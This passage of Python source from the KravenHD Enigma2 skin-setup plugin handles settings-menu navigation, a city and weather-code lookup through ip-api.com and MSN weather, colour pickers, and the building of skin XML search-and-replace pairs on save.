infobar-contents\n\t\t\tself[\"config\"].instance.moveSelectionTo(37)\n\t\tif (72 <= position <= 81): # weather\n\t\t\tself[\"config\"].instance.moveSelectionTo(55)\n\t\tif (83 <= position <= 85): # clock\n\t\t\tself[\"config\"].instance.moveSelectionTo(73)\n\t\tif (90 <= position <= 94): # ecm infos\n\t\t\tself[\"config\"].instance.moveSelectionTo(84)\n\t\tif (96 <= position <= 107): # views\n\t\t\tself[\"config\"].instance.moveSelectionTo(91)\n\t\tif (108 <= position <= 116): # channellist\n\t\t\tself[\"config\"].instance.moveSelectionTo(97)\n\t\tif (122 <= position <= 124): # numberzap\n\t\t\tself[\"config\"].instance.moveSelectionTo(109)\n\t\tif (126 <= position <= 133): # graphicalepg\n\t\t\tself[\"config\"].instance.moveSelectionTo(123)\n\t\tif (135 <= position <= 143): # emc\n\t\t\tself[\"config\"].instance.moveSelectionTo(127)\n\t\tif (144 <= position <= 147): # player\n\t\t\tself[\"config\"].instance.moveSelectionTo(136)\n\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\tif (149 <= position <= 151): # various\n\t\t\t\tself[\"config\"].instance.moveSelectionTo(145)\n\t\telse:\n\t\t\tif (149 <= position <= 152): # antialiasing\n\t\t\t\tself[\"config\"].instance.moveSelectionTo(145)\n\t\t\tif (154 <= position <= 156): # various\n\t\t\t\tself[\"config\"].instance.moveSelectionTo(150)\n\t\tself.mylist()\n\n\tdef categoryUp(self):\n\t\tposition = self[\"config\"].instance.getCurrentIndex()\n\t\tif position == 0: # about\n\t\t\tself[\"config\"].instance.moveSelectionTo(3)\n\t\tif (2 <= position <= 4): # profiles\n\t\t\tself[\"config\"].instance.moveSelectionTo(7)\n\t\tif (6 <= position <= 17): # system\n\t\t\tself[\"config\"].instance.moveSelectionTo(19)\n\t\tif (18 <= position <= 35): # global colors\n\t\t\tself[\"config\"].instance.moveSelectionTo(37)\n\t\tif (36 <= position <= 53): # infobar-look\n\t\t\tself[\"config\"].instance.moveSelectionTo(55)\n\t\tif (54 <= position <= 64): # infobar-contents\n\t\t\tself[\"config\"].instance.moveSelectionTo(73)\n\t\tif (72 <= position <= 81): # weather\n\t\t\tself[\"config\"].instance.moveSelectionTo(84)\n\t\tif (83 <= position <= 85): # clock\n\t\t\tself[\"config\"].instance.moveSelectionTo(91)\n\t\tif (90 <= position <= 94): # ecm infos\n\t\t\tself[\"config\"].instance.moveSelectionTo(97)\n\t\tif (96 <= position <= 107): # views\n\t\t\tself[\"config\"].instance.moveSelectionTo(109)\n\t\tif (108 <= position <= 116): # 
channellist\n\t\t\tself[\"config\"].instance.moveSelectionTo(123)\n\t\tif (122 <= position <= 124): # numberzap\n\t\t\tself[\"config\"].instance.moveSelectionTo(127)\n\t\tif (126 <= position <= 133): # graphicalepg\n\t\t\tself[\"config\"].instance.moveSelectionTo(136)\n\t\tif (135 <= position <= 143): # emc\n\t\t\tself[\"config\"].instance.moveSelectionTo(145)\n\t\tif (144 <= position <= 147): # player\n\t\t\tself[\"config\"].instance.moveSelectionTo(150)\n\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\tif (149 <= position <= 151): # various\n\t\t\t\tself[\"config\"].instance.moveSelectionTo(0)\n\t\telse:\n\t\t\tif (149 <= position <= 152): # antialiasing\n\t\t\t\tself[\"config\"].instance.moveSelectionTo(155)\n\t\t\tif (154 <= position <= 156): # various\n\t\t\t\tself[\"config\"].instance.moveSelectionTo(0)\n\t\tself.mylist()\n\n\tdef redbutton(self):\n\t\toption = self[\"config\"].getCurrent()[1]\n\t\tif option in (config.plugins.KravenHD.msn_searchby, config.plugins.KravenHD.msn_cityname, config.plugins.KravenHD.msn_code):\n\t\t\tself.checkCode()\n\t\telse:\n\t\t\tself.faq()\n\n\tdef getCityByIP(self):\n\t\ttry:\n\t\t\tres_city = requests.get('http://ip-api.com/json/?lang=de&fields=status,city', timeout=1)\n\t\t\tdata_city = res_city.json()\n\t\t\tif data_city['status'] == 'success':\n\t\t\t\treturn str(data_city['city'])\n\t\texcept:\n\t\t\tself.session.open(MessageBox, _('No valid location found.'), MessageBox.TYPE_INFO, timeout = 10)\n\n\tdef checkCode(self):\n\t\tif self.InternetAvailable:\n\t\t\toption = self[\"config\"].getCurrent()[1]\n\t\t\tif option.value == \"auto-ip\":\n\t\t\t\tcityip = self.getCityByIP()\n\t\t\t\tiplist = []\n\t\t\t\ttry:\n\t\t\t\t\tres_gc = requests.get('http://weather.service.msn.com/find.aspx?src=windows&outputview=search&weasearchstr=' + str(cityip) + '&culture=' + str(config.plugins.KravenHD.msn_language.value), timeout=1)\n\t\t\t\t\tdata_gc = fromstring(res_gc.text)\n\n\t\t\t\t\tfor weather in data_gc.findall(\"./weather\"):\n\t\t\t\t\t\tipcity = weather.get('weatherlocationname').encode(\"utf-8\", 'ignore')\n\t\t\t\t\t\tweathercode = weather.get('weatherlocationcode')\n\t\t\t\t\t\tiplist.append((ipcity, weathercode + \"//\" + ipcity))\n\n\t\t\t\t\tdef WeatherCodeCallBack(callback):\n\t\t\t\t\t\tcallback = callback and callback[1]\n\t\t\t\t\t\tif callback:\n\t\t\t\t\t\t\tconfig.plugins.KravenHD.msn_code.value = str(callback.split(\"//\")[0])\n\t\t\t\t\t\t\tconfig.plugins.KravenHD.msn_code.save()\n\t\t\t\t\t\t\tconfig.plugins.KravenHD.msn_cityfound.value = str(callback.split(\"//\")[1].split(\",\")[0])\n\t\t\t\t\t\t\tconfig.plugins.KravenHD.msn_cityfound.save()\n\t\t\t\t\t\t\tself.session.open(MessageBox, _(\"Weather-Code found:\\n\") + str(callback.split(\"//\")[0]), MessageBox.TYPE_INFO, timeout = 10)\n\t\t\t\t\t\tself.showPreview()\n\t\t\t\t\tself.session.openWithCallback(WeatherCodeCallBack, ChoiceBox, title = _(\"Choose your location:\"), list = iplist)\n\n\t\t\t\texcept:\n\t\t\t\t\tself.session.open(MessageBox, _('No valid location found.'), MessageBox.TYPE_INFO, timeout = 10)\n\n\t\t\tif option.value == \"location\" or option == config.plugins.KravenHD.msn_cityname:\n\t\t\t\tcitylist = []\n\t\t\t\ttry:\n\t\t\t\t\tres_gc = requests.get('http://weather.service.msn.com/find.aspx?src=windows&outputview=search&weasearchstr=' + str(config.plugins.KravenHD.msn_cityname.value) + '&culture=' + str(config.plugins.KravenHD.msn_language.value), timeout=1)\n\t\t\t\t\tdata_gc = fromstring(res_gc.text)\n\n\t\t\t\t\tfor weather in 
data_gc.findall(\"./weather\"):\n\t\t\t\t\t\tcity = weather.get('weatherlocationname').encode(\"utf-8\", 'ignore')\n\t\t\t\t\t\tcode = weather.get('weatherlocationcode')\n\t\t\t\t\t\tcitylist.append((city, code + \"//\" + city))\n\n\t\t\t\t\tdef LocationCallBack(callback):\n\t\t\t\t\t\tcallback = callback and callback[1]\n\t\t\t\t\t\tif callback:\n\t\t\t\t\t\t\tconfig.plugins.KravenHD.msn_code.value = str(callback.split(\"//\")[0])\n\t\t\t\t\t\t\tconfig.plugins.KravenHD.msn_code.save()\n\t\t\t\t\t\t\tconfig.plugins.KravenHD.msn_cityfound.value = str(callback.split(\"//\")[1].split(\",\")[0])\n\t\t\t\t\t\t\tconfig.plugins.KravenHD.msn_cityfound.save()\n\t\t\t\t\t\t\tself.session.open(MessageBox, _(\"Weather-Code found:\\n\") + str(callback.split(\"//\")[0]), MessageBox.TYPE_INFO, timeout = 10)\n\t\t\t\t\t\tself.showPreview()\n\t\t\t\t\tself.session.openWithCallback(LocationCallBack, ChoiceBox, title = _(\"Choose your location:\"), list = citylist)\n\n\t\t\t\texcept:\n\t\t\t\t\tself.session.open(MessageBox, _('No valid Weather-Code found.'), MessageBox.TYPE_INFO, timeout = 10)\n\n\tdef VirtualKeyBoardCallBack(self, callback):\n\t\ttry:\n\t\t\tif callback: \n\t\t\t\tself[\"config\"].getCurrent()[1].value = callback\n\t\t\telse:\n\t\t\t\tpass\n\t\texcept:\n\t\t\tpass\n\n\tdef ColorSelectionCallBack(self, callback):\n\t\ttry:\n\t\t\tif callback:\n\t\t\t\tself.actSelfColorSelection.value = callback\n\t\t\t\tself.actListColorSelection.value = \"self\"\n\t\t\t\tself.mylist()\n\t\t\telse:\n\t\t\t\tpass\n\t\texcept:\n\t\t\tpass\n\n\tdef OK(self):\n\t\toption = self[\"config\"].getCurrent()[1]\n\t\toptionislistcolor=False\n\n\t\tif option == config.plugins.KravenHD.BackgroundListColor:\n\t\t\tif not config.plugins.KravenHD.BackgroundListColor.value in (\"gradient\", \"texture\"):\n\t\t\t\toptionislistcolor=True\n\t\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.BackgroundSelfColor\n\t\telif option == config.plugins.KravenHD.InfobarBoxListColor:\n\t\t\tif not config.plugins.KravenHD.InfobarBoxListColor.value in (\"gradient\", \"texture\"):\n\t\t\t\toptionislistcolor=True\n\t\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.InfobarBoxSelfColor\n\t\telif option == config.plugins.KravenHD.InfobarGradientListColor:\n\t\t\tif not config.plugins.KravenHD.InfobarGradientListColor.value == \"texture\":\n\t\t\t\toptionislistcolor=True\n\t\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.InfobarGradientSelfColor\n\t\telif option == config.plugins.KravenHD.SelectionBackgroundList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.SelectionBackgroundSelf\n\t\telif option == config.plugins.KravenHD.SelectionBackground2List:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.SelectionBackground2Self\n\t\telif option == config.plugins.KravenHD.SelectionBorderList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.SelectionBorderSelf\n\t\telif option == config.plugins.KravenHD.IBProgressList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.IBProgressSelf\n\t\telif option == config.plugins.KravenHD.IBProgressBackgroundList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.IBProgressBackgroundSelf\n\t\telif option == config.plugins.KravenHD.IBProgressBorderLineColorList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = 
config.plugins.KravenHD.IBProgressBorderLineColorSelf\n\t\telif option == config.plugins.KravenHD.Font1List:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.Font1Self\n\t\telif option == config.plugins.KravenHD.Font2List:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.Font2Self\n\t\telif option == config.plugins.KravenHD.IBFont1List:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.IBFont1Self\n\t\telif option == config.plugins.KravenHD.IBFont2List:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.IBFont2Self\n\t\telif option == config.plugins.KravenHD.BackgroundGradientListColorPrimary:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.BackgroundGradientSelfColorPrimary\n\t\telif option == config.plugins.KravenHD.BackgroundGradientListColorSecondary:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.BackgroundGradientSelfColorSecondary\n\t\telif option == config.plugins.KravenHD.InfobarGradientListColorPrimary:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.InfobarGradientSelfColorPrimary\n\t\telif option == config.plugins.KravenHD.InfobarGradientListColorSecondary:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.InfobarGradientSelfColorSecondary\n\t\telif option == config.plugins.KravenHD.BackgroundAlternateListColor:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.BackgroundAlternateSelfColor\n\t\telif option == config.plugins.KravenHD.InfobarAlternateListColor:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.InfobarAlternateSelfColor\n\t\telif option == config.plugins.KravenHD.MarkedFontList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.MarkedFontSelf\n\t\telif option == config.plugins.KravenHD.PermanentClockFontList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.PermanentClockFontSelf\n\t\telif option == config.plugins.KravenHD.SelectionFontList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.SelectionFontSelf\n\t\telif option == config.plugins.KravenHD.ECMFontList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.ECMFontSelf\n\t\telif option == config.plugins.KravenHD.ChannelnameFontList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.ChannelnameFontSelf\n\t\telif option == config.plugins.KravenHD.PrimetimeFontList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.PrimetimeFontSelf\n\t\telif option == config.plugins.KravenHD.ButtonTextList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.ButtonTextSelf\n\t\telif option == config.plugins.KravenHD.AndroidList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.AndroidSelf\n\t\telif option == config.plugins.KravenHD.BorderList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.BorderSelf\n\t\telif option == config.plugins.KravenHD.ProgressList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.ProgressSelf\n\t\telif 
option == config.plugins.KravenHD.LineList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.LineSelf\n\t\telif option == config.plugins.KravenHD.IBLineList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.IBLineSelf\n\t\telif option == config.plugins.KravenHD.MiniTVBorderList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.MiniTVBorderSelf\n\t\telif option == config.plugins.KravenHD.AnalogColorList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.AnalogColorSelf\n\t\telif option == config.plugins.KravenHD.ChannelSelectionServiceNAList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.ChannelSelectionServiceNASelf\n\t\telif option == config.plugins.KravenHD.NZBorderList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.NZBorderSelf\n\t\telif option == config.plugins.KravenHD.GMESelFgList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.GMESelFgSelf\n\t\telif option == config.plugins.KravenHD.GMESelBgList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.GMESelBgSelf\n\t\telif option == config.plugins.KravenHD.GMENowFgList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.GMENowFgSelf\n\t\telif option == config.plugins.KravenHD.GMENowBgList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.GMENowBgSelf\n\t\telif option == config.plugins.KravenHD.GMEBorderList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.GMEBorderSelf\n\t\telif option == config.plugins.KravenHD.EMCSelectionBackgroundList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.EMCSelectionBackgroundSelf\n\t\telif option == config.plugins.KravenHD.EMCSelectionFontList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.EMCSelectionFontSelf\n\t\telif option == config.plugins.KravenHD.Android2List:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.Android2Self\n\t\telif option == config.plugins.KravenHD.UnwatchedColorList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.UnwatchedColorSelf\n\t\telif option == config.plugins.KravenHD.WatchingColorList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.WatchingColorSelf\n\t\telif option == config.plugins.KravenHD.FinishedColorList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.FinishedColorSelf\n\t\telif option == config.plugins.KravenHD.TunerBusyList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.TunerBusySelf\n\t\telif option == config.plugins.KravenHD.TunerLiveList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.TunerLiveSelf\n\t\telif option == config.plugins.KravenHD.TunerRecordList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.TunerRecordSelf\n\t\telif option == config.plugins.KravenHD.TunerXtremeBusyList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.TunerXtremeBusySelf\n\t\telif option == 
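config.plugins.KravenHD.MainmenuHorTitleFontList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.MainmenuHorTitleFontSelf\n\t\telif option == config.plugins.KravenHD.MainmenuHorIconColorList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.MainmenuHorIconColorSelf\n\n\t\t# NOTE: every branch above pairs a '...List' option with its '...Self'\n\t\t# counterpart (the first three additionally skip the 'gradient'/'texture'\n\t\t# values, which have no single custom color). Assuming that naming holds\n\t\t# for all pairs, the chain could be table-driven; a minimal sketch with a\n\t\t# hypothetical COLOR_PAIRS dict ({List-option: Self-option}):\n\t\t#\n\t\t#   selfoption = COLOR_PAIRS.get(option)\n\t\t#   if selfoption is not None:\n\t\t#       optionislistcolor = True\n\t\t#       self.actSelfColorSelection = selfoption\n\n\t\t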
if optionislistcolor:\n\t\t\tself.actListColorSelection=option\n\t\t\ttitle = _(\"Use the sliders to define your color:\")\n\t\t\tif self.actListColorSelection.value==\"self\":\n\t\t\t\tcolor = self.actSelfColorSelection.value\n\t\t\telif self.actListColorSelection.value==\"none\":\n\t\t\t\tcolor = \"000000\"\n\t\t\telif self.actListColorSelection.value == \"progress\":\n\t\t\t\tcolor = \"C3461B\"\n\t\t\telse:\n\t\t\t\tcolor = self.actListColorSelection.value\n\t\t\tself.session.openWithCallback(self.ColorSelectionCallBack, KravenHDColorSelection, title = title, color = color)\n\t\telif option == config.plugins.KravenHD.msn_cityname:\n\t\t\ttext = self[\"config\"].getCurrent()[1].value\n\t\t\ttitle = _(\"Enter your location:\")\n\t\t\tself.session.openWithCallback(self.VirtualKeyBoardCallBack, VirtualKeyBoard, title = title, text = text)\n\t\t\t# persists the current value right away; the text entered in the keyboard\n\t\t\t# is applied by VirtualKeyBoardCallBack and saved with the next global save\n\t\t\tconfig.plugins.KravenHD.msn_cityname.save()\n\t\telif option == config.plugins.KravenHD.customProfile:\n\t\t\tself.saveProfile(msg=True)\n\t\telif option == config.plugins.KravenHD.defaultProfile:\n\t\t\tself.reset()\n\n\tdef faq(self):\n\t\tfrom Plugins.SystemPlugins.MPHelp import PluginHelp, XMLHelpReader\n\t\treader = XMLHelpReader(resolveFilename(SCOPE_PLUGINS, \"Extensions/KravenHD/faq.xml\"))\n\t\tKravenHDFaq = PluginHelp(*reader)\n\t\tKravenHDFaq.open(self.session)\n\n\tdef reboot(self):\n\t\trestartbox = self.session.openWithCallback(self.restartGUI, MessageBox, _(\"Do you really want to reboot now?\"), MessageBox.TYPE_YESNO)\n\t\trestartbox.setTitle(_(\"Restart GUI\"))\n\n\tdef getDataByKey(self, items, key):\n\t\t# return the entry whose \"key\" field matches; fall back to the first entry\n\t\tfor item in items:\n\t\t\tif item[\"key\"] == key:\n\t\t\t\treturn item\n\t\treturn items[0]\n\n\tdef getFontStyleData(self, key):\n\t\treturn self.getDataByKey(channelselFontStyles, key)\n\n\tdef getFontSizeData(self, key):\n\t\treturn self.getDataByKey(channelInfoFontSizes, key)\n\n\tdef save(self, answer=True):\n\t\tself.saveProfile(msg=False)\n\t\tfor x in self[\"config\"].list:\n\t\t\tif len(x) > 1:\n\t\t\t\tx[1].save()\n\n\t\t# Each entry is a [search, replace] pair applied verbatim to the skin XML:\n\t\t# the first element is the stock definition, the second the user override.\n\t\tself.skinSearchAndReplace = []\n\n\t\t### Background (global)\n\t\tself.skinSearchAndReplace.append(['name=\"Kravenbg\" value=\"#00000000', 'name=\"Kravenbg\" value=\"#' + config.plugins.KravenHD.BackgroundColorTrans.value + self.skincolorbackgroundcolor])\n\n\t\t### Background2 (non-transparent)\n\t\tself.skinSearchAndReplace.append(['name=\"Kravenbg2\" value=\"#00000000', 'name=\"Kravenbg2\" value=\"#00' + self.skincolorbackgroundcolor])\n\t\tself.skinSearchAndReplace.append(['name=\"background\" value=\"#00000000', 'name=\"background\" value=\"#00' + self.skincolorbackgroundcolor])\n\n\t\t### Background3 (Menus Transparency)\n\t\tif self.actMenustyle in (\"logo\", \"metrix-icons\"):\n\t\t\tself.skinSearchAndReplace.append(['name=\"Kravenbg3\" value=\"#00000000', 'name=\"Kravenbg3\" value=\"#' + config.plugins.KravenHD.BackgroundColorTrans.value + self.skincolorbackgroundcolor])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['name=\"Kravenbg3\" value=\"#00000000', 'name=\"Kravenbg3\" value=\"#00' + self.skincolorbackgroundcolor])
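\n\n\t\t# NOTE: a sketch of how the [search, replace] pairs collected throughout\n\t\t# this method are presumably consumed once save() has assembled them (the\n\t\t# apply step is outside this excerpt; assuming plain substring replacement\n\t\t# on the skin XML, with 'skinpath' as a hypothetical path variable):\n\t\t#\n\t\t#   with open(skinpath) as f:\n\t\t#       data = f.read()\n\t\t#   for old, new in self.skinSearchAndReplace:\n\t\t#       if old:\n\t\t#           data = data.replace(old, new)\n\t\t#   with open(skinpath, \"w\") as f:\n\t\t#       f.write(data)\n\n\t\t### Background4 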
(Channellist)\n\t\tself.skinSearchAndReplace.append(['name=\"Kravenbg4\" value=\"#00000000', 'name=\"Kravenbg4\" value=\"#' + config.plugins.KravenHD.ChannelSelectionTrans.value + self.skincolorbackgroundcolor])\n\n\t\t### Background5 (Radio Channellist, MSNWeather)\n\t\tself.skinSearchAndReplace.append(['name=\"Kravenbg5\" value=\"#00000000', 'name=\"Kravenbg5\" value=\"#' + \"80\" + self.skincolorbackgroundcolor])\n\n\t\t### Background6 (Popups, bsWindow)\n\t\tif config.plugins.KravenHD.PopupStyle.value in (\"popup-grad-trans\", \"popup-box-trans\"):\n\t\t\tself.skinSearchAndReplace.append(['name=\"Kravenbg6\" value=\"#00000000', 'name=\"Kravenbg6\" value=\"#' + \"3F\" + self.skincolorbackgroundcolor])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['name=\"Kravenbg6\" value=\"#00000000', 'name=\"Kravenbg6\" value=\"#' + \"00\" + self.skincolorbackgroundcolor])\n\n\t\t### Background graphics\n\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tif config.plugins.KravenHD.BackgroundColor.value in (\"gradient\", \"texture\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telse:\n\t\t\tif config.plugins.KravenHD.BackgroundColor.value in (\"gradient\", \"texture\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### ECM. Transparency of infobar, color of text\n\t\tif config.plugins.KravenHD.IBStyle.value == \"grad\":\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenECMbg\" value=\"#F1325698', 'name=\"KravenECMbg\" value=\"#' + config.plugins.KravenHD.InfobarColorTrans.value + self.calcBrightness(self.skincolorinfobarcolor, config.plugins.KravenHD.ECMLineAntialias.value)])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenECMbg\" value=\"#F1325698', 'name=\"KravenECMbg\" value=\"#' + config.plugins.KravenHD.InfobarColorTrans.value + self.skincolorinfobarcolor])\n\n\t\t### Infobar. Transparency of infobar, color of infobar\n\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg\" value=\"#001B1775', 'name=\"KravenIBbg\" value=\"#' + config.plugins.KravenHD.InfobarColorTrans.value + self.skincolorinfobarcolor])\n\n\t\t### Screens. 
Lower Transparency of infobar and background, color of infobar or color of background, if ibar invisible\n\t\tif config.plugins.KravenHD.IBColor.value == \"all-screens\":\n\t\t\tif config.plugins.KravenHD.IBStyle.value == \"grad\":\n\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg2\" value=\"#00000000', 'name=\"KravenIBbg2\" value=\"#' + self.calcTransparency(config.plugins.KravenHD.InfobarColorTrans.value, config.plugins.KravenHD.BackgroundColorTrans.value) + self.calcBrightness(self.skincolorinfobarcolor, config.plugins.KravenHD.ScreensAntialias.value)])\n\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg3\" value=\"#00000000', 'name=\"KravenIBbg3\" value=\"#' + self.calcTransparency(config.plugins.KravenHD.InfobarColorTrans.value, config.plugins.KravenHD.BackgroundColorTrans.value) + self.calcBrightness(self.skincolorinfobarcolor, config.plugins.KravenHD.ScreensAntialias.value)])\n\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg4\" value=\"#00000000', 'name=\"KravenIBbg4\" value=\"#' + self.calcTransparency(config.plugins.KravenHD.InfobarColorTrans.value, config.plugins.KravenHD.ChannelSelectionTrans.value) + self.calcBrightness(self.skincolorinfobarcolor, config.plugins.KravenHD.ScreensAntialias.value)])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg2\" value=\"#00000000', 'name=\"KravenIBbg2\" value=\"#' + config.plugins.KravenHD.BackgroundColorTrans.value + self.skincolorinfobarcolor])\n\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg4\" value=\"#00000000', 'name=\"KravenIBbg4\" value=\"#' + config.plugins.KravenHD.ChannelSelectionTrans.value + self.skincolorinfobarcolor])\n\t\t\t\tif self.actMenustyle in (\"logo\", \"metrix-icons\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg3\" value=\"#00000000', 'name=\"KravenIBbg3\" value=\"#' + config.plugins.KravenHD.BackgroundColorTrans.value + self.skincolorinfobarcolor])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg3\" value=\"#00000000', 'name=\"KravenIBbg3\" value=\"#00' + self.skincolorinfobarcolor])\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg5\" value=\"#00000000', 'name=\"KravenIBbg5\" value=\"#00' + self.skincolorinfobarcolor])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg2\" value=\"#00000000', 'name=\"KravenIBbg2\" value=\"#' + config.plugins.KravenHD.BackgroundColorTrans.value + self.skincolorbackgroundcolor])\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg4\" value=\"#00000000', 'name=\"KravenIBbg4\" value=\"#' + config.plugins.KravenHD.ChannelSelectionTrans.value + self.skincolorbackgroundcolor])\n\t\t\tif self.actMenustyle in (\"logo\", \"metrix-icons\"):\n\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg3\" value=\"#00000000', 'name=\"KravenIBbg3\" value=\"#' + config.plugins.KravenHD.BackgroundColorTrans.value + self.skincolorbackgroundcolor])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg3\" value=\"#00000000', 'name=\"KravenIBbg3\" value=\"#00' + self.skincolorbackgroundcolor])\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg5\" value=\"#00000000', 'name=\"KravenIBbg5\" value=\"#00' + self.skincolorbackgroundcolor])\n\n\t\t### Menu\n\t\tif not self.actChannelselectionstyle in (\"channelselection-style-minitv2\", \"channelselection-style-minitv22\", \"channelselection-style-minitv33\", \"channelselection-style-nobile-minitv33\", \"channelselection-style-minitv3\", 
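\"channelselection-style-nobile-minitv3\"):\n\t\t\t# non-MiniTV channel-list styles fall back to the stock Pig renderer\n\t\t\t# instead of the skin's KravenHDMenuPig widget\n\t\t\tself.skinSearchAndReplace.append(['render=\"KravenHDMenuPig\"', 'render=\"Pig\"'])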
